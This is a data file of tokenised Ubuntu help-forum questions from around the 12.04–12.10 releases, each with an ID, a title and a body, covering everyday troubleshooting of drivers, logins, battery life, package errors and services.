210374	ubuntu release party support	i wan na held ubuntu release party in my city . how can i get support from canonical ? such as ubuntu dvd or merch ?
210381	git `` fatal : protocol error : bad line length character : ssh- ''	i 'm trying to clone any repo by git : // protocol and get this error . fatal : protocol error : bad line length character : ssh- if i 'll change protocol to https : // git will clone without errors.this error occurs only in ubuntu ( 12.04 , 12.10 ) , on debian or fedora i can clone repo without any problems . may be someone had the same problem and can help me , i searched everywhere and did n't find any solution .
210384	rake db : migrate not working in rails	i executed the following statements in terminal : rails tickets cd tickets ruby script/server //to run the app tickets on localhost:3000 ruby script/generate scaffold ticket name : string seat : string address : text price_paid : decimal email_address : string after executing the above all , i executed the migration script rake db : migrate and then tried to open localhost:3000/tickets in browser which displayed the message : '' we 're sorry , but something went wrong . '' instead of opening the app following is the output of the rake command : vverma @ l-vverma : ~/tickets $ rake db : migrate note : gem.source_index is deprecated , use specification . it will be removed on or after 2011-11-01 . gem.source_index called from /home/vverma/tickets/config/../vendor/rails/railties/lib/rails/gem_dependency.rb:21 . note : gem : :sourceindex # initialize is deprecated with no replacement . it will be removed on or after 2011-11-01 . gem : :sourceindex # initialize called from /home/vverma/tickets/config/../vendor/rails/railties/lib/rails/vendor_gem_source_index.rb:100 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/lib/ruby/vendor_ruby/1.8/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/lib/ruby/vendor_ruby/1.8/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/lib/ruby/vendor_ruby/1.8/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/lib/ruby/vendor_ruby/1.8/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/lib/ruby/vendor_ruby/1.8/rubygems/source_index.rb:91 . note : gem : :sourceindex # add_spec is deprecated , use specification.add_spec . it will be removed on or after 2011-11-01 . gem : :sourceindex # add_spec called from /usr/lib/ruby/vendor_ruby/1.8/rubygems/source_index.rb:91 . warning : 'require 'rake/rdoctask '' is deprecated . please use 'require 'rdoc/task ' ( in rdoc 2.4.2+ ) ' instead . at /usr/lib/ruby/vendor_ruby/rake/rdoctask.rb please install rdoc 2.4.2+ to generate documentation .
210387	how can i disable hud-service ?	hud-service keeps eating my cpu . this is troublematic , specially because i 'm running 12.04 in a asus eeepc . there are a lot of answers on how to change hud bindings , but what i reallyw wonder if there is a way to disable or uninstall hud-service . thanks in advance , marcos
210391	adding new commands	i have added some new commands to ~/.bash_profile but every time i start a new terminal session , it seems to forget these commands and i have to do . ~/.bash_profile again . is there a way to avoid this doing every single terminal session ? thanks .
210394	will installing 12.04 delete contents on a hard drive ?	back story : i just built a new computer about a month and installed an ssd and an hdd . today my ssd ( ocz vertex 4 ) died on me resulting in a loss of my windows 7 os . being a ubuntu user on another pc , i want to install ubuntu on my hdd . my question comes as i would like to know if installing ubuntu on the hdd will erase the contents of the hdd ? i have done installs along side windows before , but in this situation there is no operating system on this hdd , just program files and the like . i 'm using a live cd of 12.04 currently . i just want to make sure that i do n't lose any more of my files before proceeding . any help would be much appreciated . best wishes
210400	how to install ubuntu one indicator in 12.10 ?	i am trying to install the ubuntu one indicator on ubuntu 12.10 . i tried the following commands : sudo apt-add-repository ppa : rye/ubuntuone-extras sudo apt-get update sudo apt-get install indicator-ubuntuone and i get : e : unable to locate package indicator-ubuntuone does anyone knows how to install it ?
210402	battery on ubuntu 12.10 is less compared to win7 !	i installed ubuntu 12.10 alongside win7 ultimate on my lenovo ultrabook u410 , but the problem is i get 6 hours with win7 while only 3.30 hours on ubuntu . i installed powertop but it does not provide any guide to kill the processes ( by pressing various keys ) ! ! it just gives the insight of processes..nothin more.. ! ! i also installed laptopmode , set the enable laptop mode=1 but still i m stuck.. ! ! plz guide ... thnks..
210403	gnome app indicator area shows `` no indicators ''	this problem is on two of my computers , both running gnome-classic on 12.10 , my laptop and my desktop . after recent reboots , the app indicator area has text that says `` no indicators '' : indicators for battery state , dropbox , spideroak , jupiter , and various other things are not appearing . not having the battery indicator is especially troublesome because i ca n't know how long my laptop will be able to work . this happens on all user accounts . i tried to reinstall gnome desktop as advised in this answer , but it did not help . i 've tried to reset gnome to default settings following the advice in this question , but unfortunately , while it did reset most of gnome such as my desktop wallpaper and compiz settings , it did not change the indicator problem in any way . how do i get my indicators back and working properly ?
210405	gui torrent creator with webseeding	i am looking for torrent creator with web seeding ability . please tell me if there are any available to me under ubuntu or any other place .
210406	update manager can not find update from 12.04 to 12.10	i have ubuntu 12.04 . the update manager cant find the update to 12.10 .
210408	i tried to make my ubuntu 12.10 boot faster using the following link 's instructions.it crashed my unity launcher and menu bar .how do i fix this .	this was the site from which i made changes i have tried to install unity-reset , did n't help.when i log in , only the mouse functions showing only the desktop.yet , i can still run my terminal through shortcuts . i have the live cd can i restore it to the original point ? ? thanks for your time.hope to see an answer very soon .
210409	since archive.ubuntu.com does not support https , is there any alternative server that does ?	this question had n't been asked separately , so here it is . in particular , is there any official repository that provides and https alternative to the defaults http official repositories ?
210410	how to run youtube-dl through proxy server	i want to download youtube video through youtube-dl through proxy server but it shows authentication required code : http_proxy= '' http : //username : password @ proxy : port/ '' youtube-dl url it shows authentication error
210411	monitor calibration does not work - the button to calibrate is grey	the calibration of my monitor does not work the the button to calibrate is grey . pls take a look at the linked screenshot . do i need to install any further packages to calibrate the monitor ? screenshot kind regards ben
210412	how to change a user id safely if you are using encrypted home ?	inspired by this question , that seems to imply that a simple chown wo n't work because you wo n't be able to access the encrypted files . so how is the safest but still simple workaround ?
210413	what is the command line equivalent of copying a file to clipboard ?	what is the command line equivalent to pressing ctrl+c over a file in the file manager so that the file ( not the filename ) is copied to the clipboard ? a situation where this can be useful and fast , for example , is when you want to copy to the clipboard a file from the directory you are in the terminal to quickly paste the file in the directory you are in the file manager . there are others .
210415	how to retrieve tweets from command line ?	is there a simple way to retrieve someone 's tweets from the command line ? the account would be public , and the command - or script , if necessary - would retrieve all or a specified number of most recent tweets to a text file , one tweet per line , without the metadata , the newest in the first line . without the use of api , only bash .
210418	how to use an android phone as a modem ?	i have activated my mobile internet on samsung 's phone running on android 2.3 . how to use my mobile phone 's internet in my ubuntu 12.04 lts ?
210421	lenovo thinkcentre edge 72 - i7 3770s	i have tried several days to install ubuntu on my new computer . windows was preinstalled . i have installed the 64 bit 12.10 and 12.04 . i have also tried the 32 bit version of 12.04 . after having installed the os , the computer restarts , and every times this message comes : error 1962 : no operating system found . press any key to repeat boot sequence . i have tried to follow advices in different threads on the forum , but it does not work for me . i hope anyone can help me !
210426	can i cut other computer connection from terminal or software ?	i have a modem that can be accessed with my brother . sometimes my brother plays internet games and it makes my connection slower . can i cut my brother internet connection via terminal ? if not , which packages / software i should use if there is n't any facilities for cutting the connection .
210427	lower unity 's resource usage on ubuntu 12.10	i had ubuntu 12.04 on my pc and i was happy with unity 2d . i used 2d because my pc is not powerful enough to run 3d . now , i have installed ubuntu 12.10 , and it does not have unity 2d . i installed compiz-config-manager and disabled all the effects , and it is a little better now . i wonder if there is anyway to make it a little faster ?
210429	can we install 12.10 on hp touchpad ? if so please give details	i 'm an ubuntu enthusiast.i own a hp touchpad tablet running webos . i love to run ubuntu 12.x on it . i 've gone through few sites and videos , nothing is clear . please help me in this . thanks tej
210430	update manager in ubuntu 12.10 ca n't access repository , but software center can	for some reason , whenever i try to search for updates with ubuntu 12.10 's update manager , i always get this error : failed to download repository information , followed by the following details : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to extras.ubuntu.com : http : , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/i18n/translation-en unable to connect to extras.ubuntu.com : http : , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/i18n/translation-en_ca unable to connect to extras.ubuntu.com : http : , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/source/sources unable to connect to extras.ubuntu.com : http : , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/binary-amd64/packages unable to connect to extras.ubuntu.com : http : , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/main/binary-i386/packages unable to connect to extras.ubuntu.com : http : , e : some index files failed to download . they have been ignored , or old ones used instead . initially i thought that for whatever reason the repositories were down , so i switched from the canada server to the main server . i still got the same error . i also tried installing some things from the ubuntu software center . funny thing is , that worked fine and i was able to successfully download and install software from the software center , so it seems that only update manager ca n't access the repositories . i have searched for and found similar cases ( relating to ubuntu 12.10 ) , but most of those cases involved ppa 's , and i do n't use any ppa 's . help would be appreciated . thanks .
210434	making an ubuntu installation disc uefi bootable	i 'm trying to install ubuntu 12.04 on a machine with uefi ( windows 8 ) . following rod books , i managed to get my system to boot using refind . however refind does not offer me any options to boot from my ubuntu installer disc . another thing ... after following rod books ' instructions , my machine greeted me with something along the lines of `` the bootloader is not trusted '' ( my usage of the term `` bootloader '' is possibly wrong ; i 'm not well-acquainted with these terms ) i got to work around this by setting up some passwords in the bios and putting the renamed .efi of refind to the trusted list . while in this screen , it showed me the drives with a possible .efi ( among them , the drive s in rod books ' guide ) and one of the drives it showed was my optical drive with an ubuntu installer . i tried browsing for an .efi in the ubuntu installer but found none . true enough , at windows , i searched the drive for an .efi but found none . so how do i make my ubuntu installer uefi bootable ?
210435	nautilus does n't open .tex files on left-click ( 12.04 )	when i left-click a file with .tex extension from nautilus , it is not opened . no matter if i choose gedit or texmaker as default programs in `` properties '' . right-clicking , then choosing app works , though . left-clicking files with other extensions also works fine . why is that and how can i change it ?
210437	how to specify 'root ' in path in text file	i 'm following this tutorial located here on how to create a launcher for eclipse in unity . everything is going pretty well so far , i 've managed to successfully create the launcher but when i click on it , my system complains that the path to the exec is wrong . my exec for eclipse is located here : ~/opt/eclipse/eclipse and if you look at the tutorial you have to create a file and set it 's contents like so : [ desktop entry ] type=application name=eclipse comment=eclipse integrated development environment icon=eclipse exec=./opt/eclipse/eclipse terminal=true categories=development ; ide ; java ; in my case i have to provide the full location for the exec and there are a number of things that i tried that did n't work i set 'exec ' to 'exec=~/opt/eclipse/eclipse ' , 'exec=/opt/eclipse/eclipse ' and 'exec=root/opt/eclipse/eclipse ' and none of these worked.. what should i set it to in order to fix the path so that my luancher works ? update -- -- -- -- -- -- -- -- -- i tried to list those 2 directories and what i get is this :
210440	for processes to be up and running all the time	i want my python program sample.py to be always up and running . i have read some things and asked people about ways to do this . so far i have following options - upstart cron i am trying things with upstart right now . i have created a sample.conf in $ home/.init/ . # sample.conf description `` gearmanworker1 '' author `` hussain '' pre-start script logger `` pre-start for sample '' end script post-start script logger `` post-start for sample '' end script script logger `` just before executing sample.sh '' exec /usr/bin/python /home/magic/documents/gearman-python/worker.py end script but when i do sudo initctl start sample / sudo start sample it says - start : unknown job : sample when i do status sample , it says - sample stop/waiting which means sample process is not running yet . i do n't know if i am doing this right ; i am very new to this . also i do n't think cron will be the best way to achieve what i want . because i just want to monitor sample in such a way that it will automatically restart after a failure/abort . it should also restart after a reboot . also feel free to suggest any other better ways to do this .
210448	does the kernel also need to be updated if i update the intel drivers ?	i am using ubuntu 12.04 with an ivy bridge processor and am thinking of updating the intel drivers from the ppa : ubuntu-x-swat/intel-graphics-updates ppa . do i also need to update the kernel in order to get the new features listed on http : //intellinuxgraphics.org/2012.07.html ( as being kernel related ) ?
210451	what does âping : sendmsg : no buffer space availableâ mean ?	i had an intermittent issue ( which resolves itself spontaneously , after using a different connection for a while ) that caused internet requests to fail , with one particular wireless network . after about 5 requests after associating with an ap , ping would report the error ping : sendmsg : no buffer space available just as in wifi connected but no data transfer : `` ping : sendmsg : no buffer space available '' . in case it 's relevant , i 'm seeing with a centrino ultimate-n 6300 [ 8086:4238 ] wireless interface on a thinkpad x201 . bug # 836250 is possibly related . while i can work around this issue , i was wondering : what does this error message mean ? in particular , what buffer is it talking about ?
210454	the files are on the clouds but ubuntu one is not synchronising some of them	as mentionned here i 've even tried to disconnect and reconnect but some files ( all of them are libreoffice files ) are still not synchonised . what to do ? i 'm on 12.04
210464	why is my hdd going back from standy ?	my hard drives , connected to ubuntu server are producing the following log every exactly 5 minutes . nov 1 14:10:50 localhost kernel : [ 1602.884936 ] ata2.00 : hard resetting link nov 1 14:10:51 localhost kernel : [ 1603.226804 ] ata2.01 : hard resetting link nov 1 14:10:52 localhost kernel : [ 1604.274533 ] ata2.00 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) nov 1 14:10:52 localhost kernel : [ 1604.274548 ] ata2.01 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) nov 1 14:10:52 localhost kernel : [ 1604.356669 ] ata2.00 : configured for udma/133 nov 1 14:10:52 localhost kernel : [ 1604.375247 ] ata2.01 : configured for udma/133 nov 1 14:10:52 localhost kernel : [ 1604.375265 ] ata2 : eh complete i do n't think this is related to hard drive failure , because it happens for all hard drives connected and only when i write spindown_time = 12 in /etc/hdparm.conf . the reason i add this value is to put disks into standby mode after 60 seconds , which is happening after that period ( checked with hdparm -c ) . the first clue i thought that smartd was running and spinning the drive . however , i could n't find it in ps -aux | grep smart . additionally , iostat does show that nobody accessed those drives , since blk_read , blk_wrtn remain unchanged . i also killed all processes that may be doing something with hdd ( eg samba ) . so i guess the problem is solely with hdparm ... i have no more clue where that 5 minute value hides .
210465	resell ubuntu machines in the uk	good morning , i would be looking to sell ubuntu desktop machines in the uk . is this allowed , would i be able to set up a retail shop to do this ? i would be looking to partner with ebuyer and then installing the os myself ready for the end user to use . kind regards simon ball bedfordshire
210471	is there a way to schedule the downloads in transmission bittorrent client ?	i have added a couple of torrent files to transmission bittorrent client to be downloaded . i have a limited internet speed so i ca n't start all of them in a single go ; so i have to peep in after every 30 minutes or so to start downloading other file ( added to the client ) . i do n't want to peep in 30 minutes ; looking for a way to schedule the downloads ( i.e when one download completes other files can start automatically ) without manual intervention .
210472	how to revert to pre-12.10 nautilus ?	i currently have nautilus 3.6.1 default installed on my 12.10 installation ( gnome3 ) but i really do n't like the loss in features and the slower search speed compared to the version on e.g . 12.04 . how can i revert to an older nautilus version ? thanks in advance , broes
210477	`` safely remove drive '' option missing from nautilus in 12.10	safely remove drive option is missing from nautilus in 12.10 or am i missing something ? in 12.04 i could right click on the usb drive under devices in nautilus and select safely remove drive . how do i make that option available in 12.10 ? edit : when i say usb drive i mean a usb hdd , not a usb stick or ssd .
210478	laptop drains of quickly with battery	i am a ubuntu user since years and i have not come across this problem till date . my battery drains off immediately after i unplug my ac power . the options i tried : 1 ) i checked the battery state with : cat /proc/acpi/battery/bat0/state present : yes capacity state : ok charging state : charged present rate : 0 ma remaining capacity : 392 mah present voltage : 12476 mv initially it was showing charging state : charging after 5 minutes it started displaying as charged ! based on that , if i remove my ac power it shows low battery notification . 2 ) when i run acpi : acpi -b battery 0 : unknown , 9 % the battery state shows as unknown . but initially when we plug-in to ac adapter acpi -b battery 0 : charging , 9 % , 13:04:00 until charged 3 ) when i check the same with : upower -i /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:02/pnp0c09:00/pnp0c0a:00/power_supply/bat0 vendor : hp power supply : yes updated : thu nov 1 16:06:40 2012 ( 20 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 4.2336 wh energy-empty : 0 wh energy-full : 33.1128 wh energy-full-design : 33.1128 wh energy-rate : 5.6052 w voltage : 12.474 v time to full : 5.2 hours percentage : 12.7854 % capacity : 100 % technology : lithium-ion in the power stats output , it says 5 hours to charge completely , yet if i charge it even more than 5 hours and unplug the ac power , it cribs again stating low battery ! ! the same thing does not happen with windows 7 . any suggestions/help will be greatly appreciated .
210480	desktop login fails , terminal works	i have a freshly setup 12.04 lts pc system ( 120 gb ssd , 1 tb hdd , 16 gib ram ) ; since a few days , i ca n't login to the graphical desktop anymore : there is very short flashing shell window which disappears very quickly ( edit : see below ) , and i 'm confronted with the login screen again . i believe there is something about modprobe and vbox , but i ca n't read it fast enough ... i can login to a terminal ( ctrl+alt+f1 ) . it did not help to chown all contents of my home directory to me : my-group , like suggested here . this is what i could find in /var/log , grepping for the date and time ( i inserted linebreaks after < my-hostname > ; real time values preserved ) : auth.log : < date > 22:43:01 < my-hostname > lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` tobias '' < date > 22:43:08 < my-hostname > lightdm : pam_unix ( lightdm : session ) : session closed for user lightdm < date > 22:43:08 < my-hostname > lightdm : pam_unix ( lightdm : session ) : session opened for user tobias by ( uid=0 ) < date > 22:43:08 < my-hostname > lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 < date > 22:43:08 < my-hostname > lightdm : pam_unix ( lightdm : session ) : session closed for user tobias < date > 22:43:09 < my-hostname > lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) < date > 22:43:09 < my-hostname > lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :0 < date > 22:43:10 < my-hostname > lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` tobias '' < date > 22:43:10 < my-hostname > dbus [ 756 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' 1:43 '' ( uid=104 pid=1639 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.15 '' ( uid=0 pid=1005 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) kern.log : < date > 22:43:00 < my-hostname > kernel : [ 16.084525 ] eth0 : no ipv6 routers present syslog : < date > 22:43:00 < my-hostname > kernel : [ 16.084525 ] eth0 : no ipv6 routers present < date > 22:43:01 < my-hostname > ntpdate [ 1492 ] : adjust time server 91.189.94.4 offset -0.162831 sec < date > 22:43:08 < my-hostname > acpid : client 969 [ 0:0 ] has disconnected < date > 22:43:08 < my-hostname > acpid : client connected from 1553 [ 0:0 ] < date > 22:43:08 < my-hostname > acpid : 1 client rule loaded i have virtualbox and truecrypt installed , but i ca n't think of a reason why they might prevent a graphical login . i 'm confused : what is this about requirement `` user ingroup nopasswdlogin '' not met ? i do login using a password , and the password works ok when logging in to a terminal ! can i somehow read the error output , e.g . by delaying it , redirecting it to a file , or having the system prompt me for pressing a key ? has possibly any recent update caused my problem ? should i install the pending updates ? how , btw , without access to the graphical ui ? i have some working knowledge about the linux shell , but i 'm new to ubuntu . any help would be appreciated . edit : after shutting down the machine yesterday ( sudo shutdown now ) , i found the following text on the screen , which appears to be the `` flashing '' text mentioned before ( formatted ; there was some silly leading whitespace ) : could not write bytes : broken pipe speech-dispatcher disabled ; edit /etc/default/speed-dispatcher * starting virtualbox kernel modules * modprobe vboxdrv failed . please use 'dmesg ' to find out why saned disabled ; edit /etc/default/saned * checking battery state ... [ ok ] after manually copying it , i switched the machine off by pressing the button several seconds . might be that virtualbox ( 4.2 installed ) causes the problem . i 'll add some more log file extractions later today ( met ) . edit , for the records : i tried the following , from /a/133754/103086 : sudo apg-get install gdm ( when prompted , chose gdm ) rebooted ; login failed with gdm , too sudo dpkg-reconfigure lightdm , rebooted ; login wo n't work my ~/.xauthority file is empty ; deleting it and rebooting did n't change anything furthermore : deinstalled virtualbox ( sudo apt-get remove virtualbox-4.2 ) , rebooting edit : i uploaded a zip archive of selected/filtered log files to http : //www.tobias-herp.de/en/errors/ubuntu-gui-lockout . kept apt-get upgradeing recently , but unfortunately the problem persists .
210487	can you help diagnose why this laptop running ubuntu has crashed and seemingly died	my laptop had window vista on previously ( sorry ) . something went wrong , i ca n't remember , and i tried to reinstall but could n't , installed a replacement second hand hd , and installed ubuntu instead . it worked ok for a little while , before crashing . i ended up reloading ubuntu three times . it works for a while after ( say 3-5 hrs of domestic web browsing ) , and then crashes . when i turn it on now , it comes up with some options to restart in safe mode , run tests and so on . i ca n't get it to start normally . i 'm not going to re-install again . below are screen shots of what happens when i follow some of these test options . these screen shots mean nothing to me . any ideas ? surely i can fix this ... .
210489	empathy missing it 's theme ?	here you can see that it is really ugly : while my theme is : i am on a fress install of ubuntu 12.10 . p.s i am contacting with a facebook friend..
210493	what driver for nvidia geforce mx440 ?	i have recently installed ( clean install ) ubuntu 12.10 on a desktop pc with nvidia geforce mx440 ( agp 8x ) and i have problems with unity . although i can see the desktop , however i ca n't see unity bar and icons . so , i decided to install lubuntu-desktop to see the performance . and yes ! i choose lubuntu-desktop from log on screen and the performance is definetely much better and has nothing to do with the aforementioned on unity . the system has native drivers from the ubuntu installation . i did n't touch anything in xorg configuration . i also remember that i have managed to have the best performance with this graphic card on my previous ubuntu 9.10 system , by editing some values in /etc/x11/xorg.conf file . but i ca n't remember that options , because i formatted the / partition ! my question is : which is the most suitable driver for this card , in order to load the unity feature and have better performance on it ?
210494	wired card not connecting after trying to connect	i have an ubuntu 12.10 pc . when i plug in my internet cable it starts connecting and after a minute it says it ca n't connect . i tried different cables but nothing works . wlan works . i think it 's the network driver but i do n't know how to install/update it . here 's the ifconfig info ( if it helps ) : eth0 link encap : ethernet hwaddr 00:01:6c:39:2a:8d inet6 addr : fe80 : :201:6cff : fe39:2a8d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2011 errors:0 dropped:362 overruns:0 frame:0 tx packets:586 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:175452 ( 175.4 kb ) tx bytes:147211 ( 147.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:9779 errors:0 dropped:0 overruns:0 frame:0 tx packets:9779 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8460080 ( 8.4 mb ) tx bytes:8460080 ( 8.4 mb ) wlan0 link encap : ethernet hwaddr 08:10:74:35:99:9d inet6 addr : fe80 : :a10:74ff : fe35:999d/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:1790 errors:0 dropped:0 overruns:0 frame:0 tx packets:3250 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:401664 ( 401.6 kb ) tx bytes:2898773 ( 2.8 mb )
210500	error while installing an application	so i have installed synaptic package manager.. via it , i have checked once libopencv-highgui-dev and applied complete removal.. after that i installed it ... now everytime i try to install an application e.g format junkie sudo add-apt-repository ppa : format-junkie-team/release & & sudo apt-get update & & sudo apt-get install formatjunkie in the command install format junkie it gives me that error everytime : sudo apt-get install formatjunkie reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libopencv-features2d-dev : depends : libopencv-highgui-dev ( = 2.3.1-11ubuntu2 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . what should i do ? and 2nd what did i did wrong so it wo n't happen another time ? output of lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal
210506	ubuntu is very slow when launching applications	im using ubuntu 12.10 64bit and i always had this problem even in 12.04 64bit . i have tried everything since : clean install = no success install preload = no success change swappiness to 10 = no success tried every version of nvidia driver = no success checked - bencmarked the disk drive using disk utility = everything fine my pc is a sony vaio with intel core 2duo 2.60 ghz cpu and 4gb ram . im using ubuntu as my default os ( in his own ext4 partition + swap ) and the bad thing is that when i boot in win7 the pc is going way smoother and faster in contrast with ubuntu . in ubuntu is like this : boot in ubuntu , wait for let say 10 min so we are sure that everything has started and cpu load is back to 2 - 3 % , trying to start google chrome and counting 1 2 3 4 ... .. it takes 12 to 13 seconds to load .. after this if i kill chrome and try to restart it it opens in 1 sec . the same is happening with almost every application like vlc , banshee , evolution , xchat , even terminal ... ... as i see that this problem always rise in the forums with no solution after all we really need some serious help. ! !
210507	mouse pointer/cursor disappears or does n't show properly	i recently installed the new lubuntu 12.10 but i 'm having problems with mouse pointer image . when i start the os everything works fine , but if i open some programs ( for example chromium ) my cursor starts disappearing on clickable elements/icons/menus and come back only if i move it around . i tried to change cursor theme from white to black : the result is that it remains white in standby conditions or when hovering windows borders ( even after rebooting , in order to loading the new theme ) . the problem exists with guest account too . i had no problem with 12.04 , and already tested both an upgrade and a fresh installation of the os . update : i have many reasons to think that the problem is caused by lack of compatible drivers in latest version of lubuntu . i recently installed lxle , a linux distro based on lubuntu 12.04 , and the problem seems to be disappeared ( i 'll continue to test ) . i am a newbie of linux world and do n't know if this can help , but i wanted to share it with you .
210508	how do i get a huawei hilink mobile dongle modem working ?	can anyone help me fix problems with a huawi hilink mobile dongle modem . it worked initially in ubuntu 12.04 but now it does n't seem to register . i 've posted this message from windows
210509	how can i prevent the login screen to be shown after suspending ?	i mean the following screen : i am using ubuntu 10.04 . i tried various solutions from previous posts but none of them helped .
210510	ubuntu on dell latitude e5520 working slow	i know it 's a little vague , but . i really need your help . i have ubuntu 12.10 on dell latitude e5520 i5 2410m with 4gb ram & 500 gb hdd . with firefox ( 16.0.2 ) it is extremely frustrating to do anything - even when i now opened the about dialog - it took 3 seconds . occasionally when i type this message the gui freezes . by the way , the hdd light on the laptop is on about 50 % of the time . simplest tasks can take few seconds - accessing a folder for the first time , viewing images , browsing the dash menu , and even working in terminal seems to stress the computer to it 's limit . needless to say i am not running any heavy software - just firefox and some folders.. i should also note that 2 months ago everything was ok . i went traveling then for 6 weeks , and it seems that since i came back - it started . i added the 'free ' and 'top ' output , if anything else is needed please let me know . thanks ! here is free : total used free shared buffers cached mem : 4029164 3212280 816884 0 110620 2343148 -/+ buffers/cache : 758512 3270652 swap : 1998844 0 1998844 and top : top - 13:49:03 up 47 min , 2 users , load average : 0.94 , 1.35 , 1.42 tasks : 198 total , 2 running , 196 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 2.2 us , 0.6 sy , 0.0 ni , 81.6 id , 15.6 wa , 0.0 hi , 0.0 si , 0.0 st kib mem : 4029164 total , 3246036 used , 783128 free , 110816 buffers kib swap : 1998844 total , 0 used , 1998844 free , 2381608 cached pid user pr ni virt res shr s % cpu % mem time+ command 3551 elad 20 0 689m 272m 35m s 4.9 6.9 1:52.08 firefox 3601 elad 20 0 253m 36m 18m s 2.6 0.9 0:22.42 plugin-containe 1207 root 20 0 40292 15m 5064 s 1.1 0.4 1:34.47 xorg 2467 elad 20 0 275m 87m 30m s 0.8 2.2 0:55.01 compiz 3589 elad 20 0 80016 12m 9848 s 0.8 0.3 0:03.64 unity-webapps-c 2426 elad 20 0 6064 3020 772 s 0.5 0.1 0:04.03 dbus-daemon 3903 elad 20 0 103m 15m 11m s 0.5 0.4 0:01.74 gnome-terminal 2528 elad 20 0 38796 2600 2176 s 0.2 0.1 0:00.18 gvfs-afc-volume 2666 elad 20 0 105m 18m 11m s 0.2 0.5 0:11.49 unity-panel-ser 2770 elad 20 0 43816 6984 5632 s 0.2 0.2 0:00.30 mission-control 3510 root 20 0 0 0 0 s 0.2 0.0 0:00.33 kworker/0:2 3643 elad 20 0 80064 12m 9924 s 0.2 0.3 0:00.93 unity-webapps-c 3901 root 20 0 0 0 0 s 0.2 0.0 0:00.13 kworker/u:2 3963 elad 20 0 5204 1392 1012 r 0.2 0.0 0:00.22 top 1 root 20 0 3720 2164 1316 s 0.0 0.1 0:00.62 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.41 ksoftirqd/0
210513	wireless 4311 card not working	help . simon @ simon-latitude-d630 : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : bcm4311 802.11a/b/g vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fe8fc000-fe8fffff *-network description : ethernet interface product : netxtreme bcm5755m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 02 serial : 00:1c:23:24:77 : ba size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=full firmware=5755m-v3.29 ip=10.1.1.13 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : fe7f0000-fe7fffff
210517	`` quickly run '' not working anymore	the command quickly run is not working after i renamed the folder and created a new one with same name and moved the contents of the renamed folder to the new one . here is the error : error : no run command found . candidate commands are : commands , getstarted , help , quickly
